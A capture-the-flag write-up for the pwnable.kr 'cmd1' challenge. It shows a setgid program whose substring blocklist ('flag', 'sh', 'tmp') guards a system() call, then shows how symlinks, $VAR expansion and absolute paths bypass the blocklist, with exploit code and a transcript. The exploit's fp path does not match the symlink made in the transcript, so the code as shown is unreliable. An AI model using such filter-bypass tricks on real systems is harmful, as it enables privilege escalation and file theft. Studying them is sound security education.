Pwnable.kr - cmd1
0x00 Puzzle
Mommy! what is PATH environment in Linux?
ssh cmd1@pwnable.kr -p2222 (pw:guest)
0x01 Explore
ssh
cmd1@ubuntu:~$ ls -l
total 20
-r-xr-sr-x 1 root cmd1_pwn 8513 Jul 14 2015 cmd1
-rw-r--r-- 1 root root 319 Jul 14 2015 cmd1.c
-r--r----- 1 root cmd1_pwn 48 Jul 14 2015 flag
cmd1.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
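/*
 * Blocklist check on the command string that main() hands to system().
 *
 * Returns the number of forbidden substrings ("flag", "sh", "tmp") that
 * occur in cmd; 0 means the command is allowed. A NULL cmd (no argv[1])
 * is rejected instead of being passed to strstr(), which would be
 * undefined behaviour.
 *
 * Reviewer note: this is a case-sensitive substring match on the literal
 * argument only. It never sees what the string becomes once /bin/sh runs
 * it (environment-variable expansion, symlink targets, absolute paths),
 * which is exactly why it can be bypassed.
 */
int filter(char* cmd){
    static const char *const banned[] = { "flag", "sh", "tmp" };
    int r = 0;
    if (cmd == NULL) {
        return 1; /* nothing to run; treat as rejected */
    }
    for (size_t i = 0; i < sizeof banned / sizeof banned[0]; i++) {
        r += strstr(cmd, banned[i]) != NULL;
    }
    return r;
}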
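/*
 * Challenge entry point: overwrite PATH, run the blocklist on argv[1],
 * then pass argv[1] unchanged to system().
 *
 * system() executes the string via /bin/sh -c, so $VAR expansion,
 * absolute paths and symlink resolution all happen AFTER filter() has
 * looked at the literal text. putenv() replaces only PATH; every other
 * variable inherited through the caller's environment reaches that shell.
 *
 * Only change from the listing as published: the argc guard. Without it
 * argv[1] is NULL when the program is run with no argument and filter()
 * would dereference it.
 */
int main(int argc, char* argv[], char** envp){
    (void)envp; /* declared by the challenge, never read here */
    if (argc < 2) return 0;
    putenv("PATH=/fuckyouverymuch");
    if(filter(argv[1])) return 0;
    system( argv[1] );
    return 0;
}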
0x02 Solution
- A symlink to the flag, `ln -s ~/flag /tmp/flag`, bypasses the 'flag' check: the word "flag" never has to appear in argv[1], because filter() inspects only the literal command string, not the file the command ends up opening.
- Passing the symlink path through an environment variable (`fp=/tmp/flag`) bypasses the 'tmp' check: argv[1] contains only `$fp`, and `/bin/sh -c` expands it at run time, after the filter has already run. putenv() in cmd1 overwrites only PATH, so a variable supplied via execve's envp survives into that shell.
- Using `/bin/cat` by absolute path (rather than /bin/bash or /bin/sh) bypasses the 'sh' check and also sidesteps the bogus PATH, since no PATH lookup is needed. system() still runs the command through /bin/sh internally, but that string is never passed to filter().
xpl.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
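/*
 * Exploit driver for cmd1.
 *
 * Runs ./cmd1 with a hand-built argv/envp so that:
 *  - argv[1] is "/bin/cat $fp": no "flag", "sh" or "tmp" substring, so
 *    filter() lets it through, and /bin/cat is an absolute path, so the
 *    clobbered PATH does not matter;
 *  - envp carries fp=<path to a symlink to the flag>. cmd1's putenv()
 *    only replaces PATH, so fp survives, and /bin/sh -c expands $fp at
 *    run time, after the filter has already inspected the literal text.
 *
 * The fp value must match the symlink created beforehand
 * (ln -s ~/flag <path>). The transcript in this writeup links to
 * /tmp/flag; if /tmp is shared with other players a private directory is
 * safer, since anyone could pre-create a file at a well-known name.
 * ./cmd1 is resolved relative to the current directory, which is why the
 * transcript also symlinks the binary into /tmp.
 *
 * Fixes vs. the original listing: argv had two slots and no NULL
 * terminator, so execve() read past the array (undefined behaviour), and
 * an execve() failure was silent.
 */
int main(){
    char *argv[] = { "a", "/bin/cat $fp", NULL }; /* argv[0] is never read by cmd1 */
    char *envp[] = { "fp=/tmp/cmdxhyu/f", NULL };

    execve("./cmd1", argv, envp);

    /* execve() only returns on failure (no ./cmd1 in cwd, no exec bit, ...) */
    perror("execve ./cmd1");
    return 1;
}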
cmd1@ubuntu:/tmp$ ln -s ~/flag /tmp/flag
cmd1@ubuntu:/tmp$ ln -s ~/cmd1 /tmp/cmd1
cmd1@ubuntu:/tmp$ gcc -o xpl xpl.c
cmd1@ubuntu:/tmp$ ./xpl
mommy now I get what PATH environment is for :)
Done!